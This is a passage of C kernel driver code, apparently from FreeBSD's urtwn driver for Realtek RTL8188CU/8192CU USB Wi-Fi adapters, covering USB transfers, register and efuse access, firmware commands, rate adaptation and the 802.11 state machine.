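	 * before the error is propagated to the caller.
	 */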
usb_error_t err; int ntries = 10; URTWN_ASSERT_LOCKED(sc); while (ntries--) { err = usbd_do_request_flags(sc->sc_udev, &sc->sc_mtx, req, data, 0, NULL, 250 /* ms */); if (err == 0) break; DPRINTFN(1, "Control request failed, %s (retrying)\n", usbd_errstr(err)); usb_pause_mtx(&sc->sc_mtx, hz / 100); } return (err); } static struct ieee80211vap * urtwn_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct urtwn_vap *uvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return (NULL); uvp = (struct urtwn_vap *) malloc(sizeof(struct urtwn_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (uvp == NULL) return (NULL); vap = &uvp->vap; /* enable s/w bmiss handling for sta mode */ if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags | IEEE80211_CLONE_NOBEACONS, bssid, mac) != 0) { /* out of memory */ free(uvp, M_80211_VAP); return (NULL); } /* override state transition machine */ uvp->newstate = vap->iv_newstate; vap->iv_newstate = urtwn_newstate; /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return (vap); } static void urtwn_vap_delete(struct ieee80211vap *vap) { struct urtwn_vap *uvp = URTWN_VAP(vap); ieee80211_vap_detach(vap); free(uvp, M_80211_VAP); } static struct mbuf * urtwn_rx_frame(struct urtwn_softc *sc, uint8_t *buf, int pktlen, int *rssi_p) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct mbuf *m; struct r92c_rx_stat *stat; uint32_t rxdw0, rxdw3; uint8_t rate; int8_t rssi = 0; int infosz; /* * don't pass packets to the ieee80211 framework if the driver isn't * RUNNING. */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) return (NULL); stat = (struct r92c_rx_stat *)buf; rxdw0 = le32toh(stat->rxdw0); rxdw3 = le32toh(stat->rxdw3); if (rxdw0 & (R92C_RXDW0_CRCERR | R92C_RXDW0_ICVERR)) { /* * This should not happen since we setup our Rx filter * to not receive these frames. */ ifp->if_ierrors++; return (NULL); } rate = MS(rxdw3, R92C_RXDW3_RATE); infosz = MS(rxdw0, R92C_RXDW0_INFOSZ) * 8; /* Get RSSI from PHY status descriptor if present. */ if (infosz != 0 && (rxdw0 & R92C_RXDW0_PHYST)) { rssi = urtwn_get_rssi(sc, rate, &stat[1]); /* Update our average RSSI. */ urtwn_update_avgrssi(sc, rate, rssi); /* * Convert the RSSI to a range that will be accepted * by net80211. */ rssi = URTWN_RSSI(rssi); } m = m_getcl(M_DONTWAIT, MT_DATA, M_PKTHDR); if (m == NULL) { device_printf(sc->sc_dev, "could not create RX mbuf\n"); return (NULL); } /* Finalize mbuf. */ m->m_pkthdr.rcvif = ifp; wh = (struct ieee80211_frame *)((uint8_t *)&stat[1] + infosz); memcpy(mtod(m, uint8_t *), wh, pktlen); m->m_pkthdr.len = m->m_len = pktlen; if (ieee80211_radiotap_active(ic)) { struct urtwn_rx_radiotap_header *tap = &sc->sc_rxtap; tap->wr_flags = 0; /* Map HW rate index to 802.11 rate. */ if (!(rxdw3 & R92C_RXDW3_HT)) { switch (rate) { /* CCK. */ case 0: tap->wr_rate = 2; break; case 1: tap->wr_rate = 4; break; case 2: tap->wr_rate = 11; break; case 3: tap->wr_rate = 22; break; /* OFDM. */ case 4: tap->wr_rate = 12; break; case 5: tap->wr_rate = 18; break; case 6: tap->wr_rate = 24; break; case 7: tap->wr_rate = 36; break; case 8: tap->wr_rate = 48; break; case 9: tap->wr_rate = 72; break; case 10: tap->wr_rate = 96; break; case 11: tap->wr_rate = 108; break; } } else if (rate >= 12) { /* MCS0~15. 
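 * The radiotap rate field is otherwise reported in the usual 500 kb/s
 * units (2 = 1 Mb/s ... 108 = 54 Mb/s); for HT frames the MCS index is
 * reported instead, flagged by bit 0x80 below.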
*/ /* Bit 7 set means HT MCS instead of rate. */ tap->wr_rate = 0x80 | (rate - 12); } tap->wr_dbm_antsignal = rssi; tap->wr_chan_freq = htole16(ic->ic_curchan->ic_freq); tap->wr_chan_flags = htole16(ic->ic_curchan->ic_flags); } *rssi_p = rssi; return (m); } static struct mbuf * urtwn_rxeof(struct usb_xfer *xfer, struct urtwn_data *data, int *rssi, int8_t *nf) { struct urtwn_softc *sc = data->sc; struct ifnet *ifp = sc->sc_ifp; struct r92c_rx_stat *stat; struct mbuf *m, *m0 = NULL, *prevm = NULL; uint32_t rxdw0; uint8_t *buf; int len, totlen, pktlen, infosz, npkts; usbd_xfer_status(xfer, &len, NULL, NULL, NULL); if (len < sizeof(*stat)) { ifp->if_ierrors++; return (NULL); } buf = data->buf; /* Get the number of encapsulated frames. */ stat = (struct r92c_rx_stat *)buf; npkts = MS(le32toh(stat->rxdw2), R92C_RXDW2_PKTCNT); DPRINTFN(6, "Rx %d frames in one chunk\n", npkts); /* Process all of them. */ while (npkts-- > 0) { if (len < sizeof(*stat)) break; stat = (struct r92c_rx_stat *)buf; rxdw0 = le32toh(stat->rxdw0); pktlen = MS(rxdw0, R92C_RXDW0_PKTLEN); if (pktlen == 0) break; infosz = MS(rxdw0, R92C_RXDW0_INFOSZ) * 8; /* Make sure everything fits in xfer. */ totlen = sizeof(*stat) + infosz + pktlen; if (totlen > len) break; m = urtwn_rx_frame(sc, buf, pktlen, rssi); if (m0 == NULL) m0 = m; if (prevm == NULL) prevm = m; else { prevm->m_next = m; prevm = m; } /* Next chunk is 128-byte aligned. */ totlen = (totlen + 127) & ~127; buf += totlen; len -= totlen; } return (m0); } static void urtwn_bulk_rx_callback(struct usb_xfer *xfer, usb_error_t error) { struct urtwn_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *m = NULL, *next; struct urtwn_data *data; int8_t nf; int rssi = 1; URTWN_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_rx_active); if (data == NULL) goto tr_setup; STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); m = urtwn_rxeof(xfer, data, &rssi, &nf); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: data = STAILQ_FIRST(&sc->sc_rx_inactive); if (data == NULL) { KASSERT(m == NULL, ("mbuf isn't NULL")); return; } STAILQ_REMOVE_HEAD(&sc->sc_rx_inactive, next); STAILQ_INSERT_TAIL(&sc->sc_rx_active, data, next); usbd_xfer_set_frame_data(xfer, 0, data->buf, usbd_xfer_max_len(xfer)); usbd_transfer_submit(xfer); /* * To avoid LOR we should unlock our private mutex here to call * ieee80211_input() because here is at the end of a USB * callback and safe to unlock. */ URTWN_UNLOCK(sc); while (m != NULL) { next = m->m_next; m->m_next = NULL; wh = mtod(m, struct ieee80211_frame *); ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); nf = URTWN_NOISE_FLOOR; if (ni != NULL) { (void)ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else (void)ieee80211_input_all(ic, m, rssi, nf); m = next; } URTWN_LOCK(sc); break; default: /* needs it to the inactive queue due to a error. 
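 * That is: on a transfer error the active Rx buffer is returned to the
 * inactive queue and, unless the transfer was cancelled, the stall is
 * cleared and reception is restarted via tr_setup.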
*/ data = STAILQ_FIRST(&sc->sc_rx_active); if (data != NULL) { STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); ifp->if_ierrors++; goto tr_setup; } break; } } static void urtwn_txeof(struct usb_xfer *xfer, struct urtwn_data *data) { struct urtwn_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct mbuf *m; URTWN_ASSERT_LOCKED(sc); /* * Do any tx complete callback. Note this must be done before releasing * the node reference. */ if (data->m) { m = data->m; if (m->m_flags & M_TXCB) { /* XXX status? */ ieee80211_process_callback(data->ni, m, 0); } m_freem(m); data->m = NULL; } if (data->ni) { ieee80211_free_node(data->ni); data->ni = NULL; } sc->sc_txtimer = 0; ifp->if_opackets++; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; } static void urtwn_bulk_tx_callback(struct usb_xfer *xfer, usb_error_t error) { struct urtwn_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct urtwn_data *data; URTWN_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)){ case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto tr_setup; STAILQ_REMOVE_HEAD(&sc->sc_tx_active, next); urtwn_txeof(xfer, data); STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data, next); /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: data = STAILQ_FIRST(&sc->sc_tx_pending); if (data == NULL) { DPRINTF("%s: empty pending queue\n", __func__); return; } STAILQ_REMOVE_HEAD(&sc->sc_tx_pending, next); STAILQ_INSERT_TAIL(&sc->sc_tx_active, data, next); usbd_xfer_set_frame_data(xfer, 0, data->buf, data->buflen); usbd_transfer_submit(xfer); URTWN_UNLOCK(sc); urtwn_start(ifp); URTWN_LOCK(sc); break; default: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto tr_setup; if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; ifp->if_oerrors++; } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); goto tr_setup; } break; } } static struct urtwn_data * _urtwn_getbuf(struct urtwn_softc *sc) { struct urtwn_data *bf; bf = STAILQ_FIRST(&sc->sc_tx_inactive); if (bf != NULL) STAILQ_REMOVE_HEAD(&sc->sc_tx_inactive, next); else bf = NULL; if (bf == NULL) DPRINTF("%s: %s\n", __func__, "out of xmit buffers"); return (bf); } static struct urtwn_data * urtwn_getbuf(struct urtwn_softc *sc) { struct urtwn_data *bf; URTWN_ASSERT_LOCKED(sc); bf = _urtwn_getbuf(sc); if (bf == NULL) { struct ifnet *ifp = sc->sc_ifp; DPRINTF("%s: stop queue\n", __func__); ifp->if_drv_flags |= IFF_DRV_OACTIVE; } return (bf); } static int urtwn_write_region_1(struct urtwn_softc *sc, uint16_t addr, uint8_t *buf, int len) { usb_device_request_t req; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = R92C_REQ_REGS; USETW(req.wValue, addr); USETW(req.wIndex, 0); USETW(req.wLength, len); return (urtwn_do_request(sc, &req, buf)); } static void urtwn_write_1(struct urtwn_softc *sc, uint16_t addr, uint8_t val) { urtwn_write_region_1(sc, addr, &val, 1); } static void urtwn_write_2(struct urtwn_softc *sc, uint16_t addr, uint16_t val) { val = htole16(val); urtwn_write_region_1(sc, addr, (uint8_t *)&val, 2); } static void urtwn_write_4(struct urtwn_softc *sc, uint16_t addr, uint32_t val) { val = htole32(val); urtwn_write_region_1(sc, addr, (uint8_t *)&val, 4); } static int urtwn_read_region_1(struct urtwn_softc *sc, uint16_t addr, uint8_t *buf, int len) { usb_device_request_t req; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = R92C_REQ_REGS; USETW(req.wValue, addr); USETW(req.wIndex, 
0); USETW(req.wLength, len); return (urtwn_do_request(sc, &req, buf)); } static uint8_t urtwn_read_1(struct urtwn_softc *sc, uint16_t addr) { uint8_t val; if (urtwn_read_region_1(sc, addr, &val, 1) != 0) return (0xff); return (val); } static uint16_t urtwn_read_2(struct urtwn_softc *sc, uint16_t addr) { uint16_t val; if (urtwn_read_region_1(sc, addr, (uint8_t *)&val, 2) != 0) return (0xffff); return (le16toh(val)); } static uint32_t urtwn_read_4(struct urtwn_softc *sc, uint16_t addr) { uint32_t val; if (urtwn_read_region_1(sc, addr, (uint8_t *)&val, 4) != 0) return (0xffffffff); return (le32toh(val)); } static int urtwn_fw_cmd(struct urtwn_softc *sc, uint8_t id, const void *buf, int len) { struct r92c_fw_cmd cmd; int ntries; /* Wait for current FW box to be empty. */ for (ntries = 0; ntries < 100; ntries++) { if (!(urtwn_read_1(sc, R92C_HMETFR) & (1 << sc->fwcur))) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not send firmware command\n"); return (ETIMEDOUT); } memset(&cmd, 0, sizeof(cmd)); cmd.id = id; if (len > 3) cmd.id |= R92C_CMD_FLAG_EXT; KASSERT(len <= sizeof(cmd.msg), ("urtwn_fw_cmd\n")); memcpy(cmd.msg, buf, len); /* Write the first word last since that will trigger the FW. */ urtwn_write_region_1(sc, R92C_HMEBOX_EXT(sc->fwcur), (uint8_t *)&cmd + 4, 2); urtwn_write_region_1(sc, R92C_HMEBOX(sc->fwcur), (uint8_t *)&cmd + 0, 4); sc->fwcur = (sc->fwcur + 1) % R92C_H2C_NBOX; return (0); } static void urtwn_rf_write(struct urtwn_softc *sc, int chain, uint8_t addr, uint32_t val) { urtwn_bb_write(sc, R92C_LSSI_PARAM(chain), SM(R92C_LSSI_PARAM_ADDR, addr) | SM(R92C_LSSI_PARAM_DATA, val)); } static uint32_t urtwn_rf_read(struct urtwn_softc *sc, int chain, uint8_t addr) { uint32_t reg[R92C_MAX_CHAINS], val; reg[0] = urtwn_bb_read(sc, R92C_HSSI_PARAM2(0)); if (chain != 0) reg[chain] = urtwn_bb_read(sc, R92C_HSSI_PARAM2(chain)); urtwn_bb_write(sc, R92C_HSSI_PARAM2(0), reg[0] & ~R92C_HSSI_PARAM2_READ_EDGE); DELAY(1000); urtwn_bb_write(sc, R92C_HSSI_PARAM2(chain), RW(reg[chain], R92C_HSSI_PARAM2_READ_ADDR, addr) | R92C_HSSI_PARAM2_READ_EDGE); DELAY(1000); urtwn_bb_write(sc, R92C_HSSI_PARAM2(0), reg[0] | R92C_HSSI_PARAM2_READ_EDGE); DELAY(1000); if (urtwn_bb_read(sc, R92C_HSSI_PARAM1(chain)) & R92C_HSSI_PARAM1_PI) val = urtwn_bb_read(sc, R92C_HSPI_READBACK(chain)); else val = urtwn_bb_read(sc, R92C_LSSI_READBACK(chain)); return (MS(val, R92C_LSSI_READBACK_DATA)); } static int urtwn_llt_write(struct urtwn_softc *sc, uint32_t addr, uint32_t data) { int ntries; urtwn_write_4(sc, R92C_LLT_INIT, SM(R92C_LLT_INIT_OP, R92C_LLT_INIT_OP_WRITE) | SM(R92C_LLT_INIT_ADDR, addr) | SM(R92C_LLT_INIT_DATA, data)); /* Wait for write operation to complete. */ for (ntries = 0; ntries < 20; ntries++) { if (MS(urtwn_read_4(sc, R92C_LLT_INIT), R92C_LLT_INIT_OP) == R92C_LLT_INIT_OP_NO_ACTIVE) return (0); DELAY(5); } return (ETIMEDOUT); } static uint8_t urtwn_efuse_read_1(struct urtwn_softc *sc, uint16_t addr) { uint32_t reg; int ntries; reg = urtwn_read_4(sc, R92C_EFUSE_CTRL); reg = RW(reg, R92C_EFUSE_CTRL_ADDR, addr); reg &= ~R92C_EFUSE_CTRL_VALID; urtwn_write_4(sc, R92C_EFUSE_CTRL, reg); /* Wait for read operation to complete. 
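 * The loop below polls R92C_EFUSE_CTRL up to 100 times with DELAY(5)
 * between reads (on the order of 500 us) before giving up and
 * returning 0xff.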
*/ for (ntries = 0; ntries < 100; ntries++) { reg = urtwn_read_4(sc, R92C_EFUSE_CTRL); if (reg & R92C_EFUSE_CTRL_VALID) return (MS(reg, R92C_EFUSE_CTRL_DATA)); DELAY(5); } device_printf(sc->sc_dev, "could not read efuse byte at address 0x%x\n", addr); return (0xff); } static void urtwn_efuse_read(struct urtwn_softc *sc) { uint8_t *rom = (uint8_t *)&sc->rom; uint16_t addr = 0; uint32_t reg; uint8_t off, msk; int i; reg = urtwn_read_2(sc, R92C_SYS_ISO_CTRL); if (!(reg & R92C_SYS_ISO_CTRL_PWC_EV12V)) { urtwn_write_2(sc, R92C_SYS_ISO_CTRL, reg | R92C_SYS_ISO_CTRL_PWC_EV12V); } reg = urtwn_read_2(sc, R92C_SYS_FUNC_EN); if (!(reg & R92C_SYS_FUNC_EN_ELDR)) { urtwn_write_2(sc, R92C_SYS_FUNC_EN, reg | R92C_SYS_FUNC_EN_ELDR); } reg = urtwn_read_2(sc, R92C_SYS_CLKR); if ((reg & (R92C_SYS_CLKR_LOADER_EN | R92C_SYS_CLKR_ANA8M)) != (R92C_SYS_CLKR_LOADER_EN | R92C_SYS_CLKR_ANA8M)) { urtwn_write_2(sc, R92C_SYS_CLKR, reg | R92C_SYS_CLKR_LOADER_EN | R92C_SYS_CLKR_ANA8M); } memset(&sc->rom, 0xff, sizeof(sc->rom)); while (addr < 512) { reg = urtwn_efuse_read_1(sc, addr); if (reg == 0xff) break; addr++; off = reg >> 4; msk = reg & 0xf; for (i = 0; i < 4; i++) { if (msk & (1 << i)) continue; rom[off * 8 + i * 2 + 0] = urtwn_efuse_read_1(sc, addr); addr++; rom[off * 8 + i * 2 + 1] = urtwn_efuse_read_1(sc, addr); addr++; } } #ifdef URTWN_DEBUG if (urtwn_debug >= 2) { /* Dump ROM content. */ printf("\n"); for (i = 0; i < sizeof(sc->rom); i++) printf("%02x:", rom[i]); printf("\n"); } #endif } static int urtwn_read_chipid(struct urtwn_softc *sc) { uint32_t reg; reg = urtwn_read_4(sc, R92C_SYS_CFG); if (reg & R92C_SYS_CFG_TRP_VAUX_EN) return (EIO); if (reg & R92C_SYS_CFG_TYPE_92C) { sc->chip |= URTWN_CHIP_92C; /* Check if it is a castrated 8192C. */ if (MS(urtwn_read_4(sc, R92C_HPON_FSM), R92C_HPON_FSM_CHIP_BONDING_ID) == R92C_HPON_FSM_CHIP_BONDING_ID_92C_1T2R) sc->chip |= URTWN_CHIP_92C_1T2R; } if (reg & R92C_SYS_CFG_VENDOR_UMC) { sc->chip |= URTWN_CHIP_UMC; if (MS(reg, R92C_SYS_CFG_CHIP_VER_RTL) == 0) sc->chip |= URTWN_CHIP_UMC_A_CUT; } return (0); } static void urtwn_read_rom(struct urtwn_softc *sc) { struct r92c_rom *rom = &sc->rom; /* Read full ROM image. */ urtwn_efuse_read(sc); /* XXX Weird but this is what the vendor driver does. */ sc->pa_setting = urtwn_efuse_read_1(sc, 0x1fa); DPRINTF("PA setting=0x%x\n", sc->pa_setting); sc->board_type = MS(rom->rf_opt1, R92C_ROM_RF1_BOARD_TYPE); sc->regulatory = MS(rom->rf_opt1, R92C_ROM_RF1_REGULATORY); DPRINTF("regulatory type=%d\n", sc->regulatory); IEEE80211_ADDR_COPY(sc->sc_bssid, rom->macaddr); } /* * Initialize rate adaptation in firmware. */ static int urtwn_ra_init(struct urtwn_softc *sc) { static const uint8_t map[] = { 2, 4, 11, 22, 12, 18, 24, 36, 48, 72, 96, 108 }; struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ieee80211_node *ni; struct ieee80211_rateset *rs; struct r92c_fw_cmd_macid_cfg cmd; uint32_t rates, basicrates; uint8_t mode; int maxrate, maxbasicrate, error, i, j; ni = ieee80211_ref_node(vap->iv_bss); rs = &ni->ni_rates; /* Get normal and basic rates mask. */ rates = basicrates = 0; maxrate = maxbasicrate = 0; for (i = 0; i < rs->rs_nrates; i++) { /* Convert 802.11 rate to HW rate index. */ for (j = 0; j < nitems(map); j++) if ((rs->rs_rates[i] & IEEE80211_RATE_VAL) == map[j]) break; if (j == nitems(map)) /* Unknown rate, skip. 
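 * map[] above lists the 802.11 rates in 500 kb/s units (2/4/11/22 are
 * CCK 1/2/5.5/11 Mb/s, 12..108 are OFDM 6..54 Mb/s); the matching index
 * j doubles as the hardware rate index used in the masks below.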
*/ continue; rates |= 1 << j; if (j > maxrate) maxrate = j; if (rs->rs_rates[i] & IEEE80211_RATE_BASIC) { basicrates |= 1 << j; if (j > maxbasicrate) maxbasicrate = j; } } if (ic->ic_curmode == IEEE80211_MODE_11B) mode = R92C_RAID_11B; else mode = R92C_RAID_11BG; DPRINTF("mode=0x%x rates=0x%08x, basicrates=0x%08x\n", mode, rates, basicrates); /* Set rates mask for group addressed frames. */ cmd.macid = URTWN_MACID_BC | URTWN_MACID_VALID; cmd.mask = htole32(mode << 28 | basicrates); error = urtwn_fw_cmd(sc, R92C_CMD_MACID_CONFIG, &cmd, sizeof(cmd)); if (error != 0) { ieee80211_free_node(ni); device_printf(sc->sc_dev, "could not add broadcast station\n"); return (error); } /* Set initial MRR rate. */ DPRINTF("maxbasicrate=%d\n", maxbasicrate); urtwn_write_1(sc, R92C_INIDATA_RATE_SEL(URTWN_MACID_BC), maxbasicrate); /* Set rates mask for unicast frames. */ cmd.macid = URTWN_MACID_BSS | URTWN_MACID_VALID; cmd.mask = htole32(mode << 28 | rates); error = urtwn_fw_cmd(sc, R92C_CMD_MACID_CONFIG, &cmd, sizeof(cmd)); if (error != 0) { ieee80211_free_node(ni); device_printf(sc->sc_dev, "could not add BSS station\n"); return (error); } /* Set initial MRR rate. */ DPRINTF("maxrate=%d\n", maxrate); urtwn_write_1(sc, R92C_INIDATA_RATE_SEL(URTWN_MACID_BSS), maxrate); /* Indicate highest supported rate. */ ni->ni_txrate = rs->rs_rates[rs->rs_nrates - 1]; ieee80211_free_node(ni); return (0); } void urtwn_tsf_sync_enable(struct urtwn_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ieee80211_node *ni = vap->iv_bss; uint64_t tsf; /* Enable TSF synchronization. */ urtwn_write_1(sc, R92C_BCN_CTRL, urtwn_read_1(sc, R92C_BCN_CTRL) & ~R92C_BCN_CTRL_DIS_TSF_UDT0); urtwn_write_1(sc, R92C_BCN_CTRL, urtwn_read_1(sc, R92C_BCN_CTRL) & ~R92C_BCN_CTRL_EN_BCN); /* Set initial TSF. */ memcpy(&tsf, ni->ni_tstamp.data, 8); tsf = le64toh(tsf); tsf = tsf - (tsf % (vap->iv_bss->ni_intval * IEEE80211_DUR_TU)); tsf -= IEEE80211_DUR_TU; urtwn_write_4(sc, R92C_TSFTR + 0, tsf); urtwn_write_4(sc, R92C_TSFTR + 4, tsf >> 32); urtwn_write_1(sc, R92C_BCN_CTRL, urtwn_read_1(sc, R92C_BCN_CTRL) | R92C_BCN_CTRL_EN_BCN); } static void urtwn_set_led(struct urtwn_softc *sc, int led, int on) { uint8_t reg; if (led == URTWN_LED_LINK) { reg = urtwn_read_1(sc, R92C_LEDCFG0) & 0x70; if (!on) reg |= R92C_LEDCFG0_DIS; urtwn_write_1(sc, R92C_LEDCFG0, reg); sc->ledlink = on; /* Save LED state. */ } } static int urtwn_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct urtwn_vap *uvp = URTWN_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct urtwn_softc *sc = ic->ic_ifp->if_softc; struct ieee80211_node *ni; enum ieee80211_state ostate; uint32_t reg; ostate = vap->iv_state; DPRINTF("%s -> %s\n", ieee80211_state_name[ostate], ieee80211_state_name[nstate]); IEEE80211_UNLOCK(ic); URTWN_LOCK(sc); callout_stop(&sc->sc_watchdog_ch); if (ostate == IEEE80211_S_RUN) { /* Turn link LED off. */ urtwn_set_led(sc, URTWN_LED_LINK, 0); /* Set media status to 'No Link'. */ reg = urtwn_read_4(sc, R92C_CR); reg = RW(reg, R92C_CR_NETTYPE, R92C_CR_NETTYPE_NOLINK); urtwn_write_4(sc, R92C_CR, reg); /* Stop Rx of data frames. */ urtwn_write_2(sc, R92C_RXFLTMAP2, 0); /* Rest TSF. */ urtwn_write_1(sc, R92C_DUAL_TSF_RST, 0x03); /* Disable TSF synchronization. */ urtwn_write_1(sc, R92C_BCN_CTRL, urtwn_read_1(sc, R92C_BCN_CTRL) | R92C_BCN_CTRL_DIS_TSF_UDT0); /* Reset EDCA parameters. 
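 * The four writes below reload fixed per-AC (VO/VI/BE/BK) EDCA parameter
 * words when the association is torn down; the packed layout of these
 * 32-bit values (presumably AIFS/CW/TXOP fields) is chip-specific.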
*/ urtwn_write_4(sc, R92C_EDCA_VO_PARAM, 0x002f3217); urtwn_write_4(sc, R92C_EDCA_VI_PARAM, 0x005e4317); urtwn_write_4(sc, R92C_EDCA_BE_PARAM, 0x00105320); urtwn_write_4(sc, R92C_EDCA_BK_PARAM, 0x0000a444); } switch (nstate) { case IEEE80211_S_INIT: /* Turn link LED off. */ urtwn_set_led(sc, URTWN_LED_LINK, 0); break; case IEEE80211_S_SCAN: if (ostate != IEEE80211_S_SCAN) { /* Allow Rx from any BSSID. */ urtwn_write_4(sc, R92C_RCR, urtwn_read_4(sc, R92C_RCR) & ~(R92C_RCR_CBSSID_DATA | R92C_RCR_CBSSID_BCN)); /* Set gain for scanning. */ reg = urtwn_bb_read(sc, R92C_OFDM0_AGCCORE1(0)); reg = RW(reg, R92C_OFDM0_AGCCORE1_GAIN, 0x20); urtwn_bb_write(sc, R92C_OFDM0_AGCCORE1(0), reg); reg = urtwn_bb_read(sc, R92C_OFDM0_AGCCORE1(1)); reg = RW(reg, R92C_OFDM0_AGCCORE1_GAIN, 0x20); urtwn_bb_write(sc, R92C_OFDM0_AGCCORE1(1), reg); } /* Make link LED blink during scan. */ urtwn_set_led(sc, URTWN_LED_LINK, !sc->ledlink); /* Pause AC Tx queues. */ urtwn_write_1(sc, R92C_TXPAUSE, urtwn_read_1(sc, R92C_TXPAUSE) | 0x0f); urtwn_set_chan(sc, ic->ic_curchan, NULL); break; case IEEE80211_S_AUTH: /* Set initial gain under link. */ reg = urtwn_bb_read(sc, R92C_OFDM0_AGCCORE1(0)); reg = RW(reg, R92C_OFDM0_AGCCORE1_GAIN, 0x32); urtwn_bb_write(sc, R92C_OFDM0_AGCCORE1(0), reg); reg = urtwn_bb_read(sc, R92C_OFDM0_AGCCORE1(1)); reg = RW(reg, R92C_OFDM0_AGCCORE1_GAIN, 0x32); urtwn_bb_write(sc, R92C_OFDM0_AGCCORE1(1), reg); urtwn_set_chan(sc, ic->ic_curchan, NULL); break; case IEEE80211_S_RUN: if (vap->iv_opmode == IEEE80211_M_MONITOR) { /* Enable Rx of data frames. */ urtwn_write_2(sc, R92C_RXFLTMAP2, 0xffff); /* Turn link LED on. */ urtwn_set_led(sc, URTWN_LED_LINK, 1); break; } ni = ieee80211_ref_node(vap->iv_bss); /* Set media status to 'Associated'. */ reg = urtwn_read_4(sc, R92C_CR); reg = RW(reg, R92C_CR_NETTYPE, R92C_CR_NETTYPE_INFRA); urtwn_write_4(sc, R92C_CR, reg); /* Set BSSID. */ urtwn_write_4(sc, R92C_BSSID + 0, LE_READ_4(&ni->ni_bssid[0])); urtwn_write_4(sc, R92C_BSSID + 4, LE_READ_2(&ni->ni_bssid[4])); if (ic->ic_curmode == IEEE80211_MODE_11B) urtwn_write_1(sc, R92C_INIRTS_RATE_SEL, 0); else /* 802.11b/g */ urtwn_write_1(sc, R92C_INIRTS_RATE_SEL, 3); /* Enable Rx of data frames. */ urtwn_write_2(sc, R92C_RXFLTMAP2, 0xffff); /* Flush all AC queues. */ urtwn_write_1(sc, R92C_TXPAUSE, 0); /* Set beacon interval. */ urtwn_write_2(sc, R92C_BCN_INTERVAL, ni->ni_intval); /* Allow Rx from our BSSID only. */ urtwn_write_4(sc, R92C_RCR, urtwn_read_4(sc, R92C_RCR) | R92C_RCR_CBSSID_DATA | R92C_RCR_CBSSID_BCN); /* Enable TSF synchronization. */ urtwn_tsf_sync_enable(sc); urtwn_write_1(sc, R92C_SIFS_CCK + 1, 10); urtwn_write_1(sc, R92C_SIFS_OFDM + 1, 10); urtwn_write_1(sc, R92C_SPEC_SIFS + 1, 10); urtwn_write_1(sc, R92C_MAC_SPEC_SIFS + 1, 10); urtwn_write_1(sc, R92C_R2T_SIFS + 1, 10); urtwn_write_1(sc, R92C_T2T_SIFS + 1, 10); /* Intialize rate adaptation. */ urtwn_ra_init(sc); /* Turn link LED on. */ urtwn_set_led(sc, URTWN_LED_LINK, 1); sc->avg_pwdb = -1; /* Reset average RSSI. */ /* Reset temperature calibration state machine. 
*/ sc->thcal_state = 0; sc->thcal_lctemp = 0; ieee80211_free_node(ni); break; default: break; } URTWN_UNLOCK(sc); IEEE80211_LOCK(ic); return(uvp->newstate(vap, nstate, arg)); } static void urtwn_watchdog(void *arg) { struct urtwn_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; if (sc->sc_txtimer > 0) { if (--sc->sc_txtimer == 0) { device_printf(sc->sc_dev, "device timeout\n"); ifp->if_oerrors++; return; } callout_reset(&sc->sc_watchdog_ch, hz, urtwn_watchdog, sc); } } static void urtwn_update_avgrssi(struct urtwn_softc *sc, int rate, int8_t rssi) { int pwdb; /* Convert antenna signal to percentage. */ if (rssi <= -100 || rssi >= 20) pwdb = 0; else if (rssi >= 0) pwdb = 100; else pwdb = 100 + rssi; if (rate <= 3) { /* CCK gain is smaller than OFDM/MCS gain. */ pwdb += 6; if (pwdb > 100) pwdb = 100; if (pwdb <= 14) pwdb -= 4; else if (pwdb <= 26) pwdb -= 8; else if (pwdb <= 34) pwdb -= 6; else if (pwdb <= 42) pwdb -= 2; } if (sc->avg_pwdb == -1) /* Init. */ sc->avg_pwdb = pwdb; else if (sc->avg_pwdb < pwdb) sc->avg_pwdb = ((sc->avg_pwdb * 19 + pwdb) / 20) + 1; else sc->avg_pwdb = 